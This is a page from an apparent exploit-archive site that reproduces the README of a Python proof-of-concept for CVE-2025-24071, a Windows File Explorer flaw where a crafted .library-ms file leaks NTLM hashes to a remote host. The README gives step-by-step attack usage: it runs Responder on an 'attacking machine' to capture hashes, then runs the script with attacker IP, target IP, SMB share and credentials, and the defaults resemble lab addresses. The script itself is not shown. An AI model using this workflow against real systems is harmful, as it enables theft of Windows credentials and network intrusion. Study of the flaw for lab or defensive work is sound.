Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-24071 PoC — Microsoft Windows File Explorer Spoofing Vulnerability

Source
Associated Vulnerability
Title: Microsoft Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
Description:Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
Description
Python script to execute CVE-2025-24071
Readme
# CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability (script by SilentExploit) 

## 📖 Description
This project detects and demonstrates exploitation of a **Windows File Explorer spoofing vulnerability**.

The issue arises from a **Windows library file (`.library-ms`)** containing a network path, either as a direct attachment or embedded in an archive.  
When opened, the file can cause Windows to **leak NTLM hashes** to a remote (potentially malicious) network location.

POC: https://imgur.com/a/hEO83Se
---

## ⚡ Usage

### 1. Start Responder
On your attacking machine, run Responder to capture NTLM hashes:

```bash
sudo responder -I tun0 -wvF
```

2. Run the Script

You can configure the script in two ways:

✅ Option A: Edit defaults (easiest)

Modify the default parameters in the script directly.

```bash
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()
```

✅ Option B: Run with CLI parameters

Execute with arguments:

```bash
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
```

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →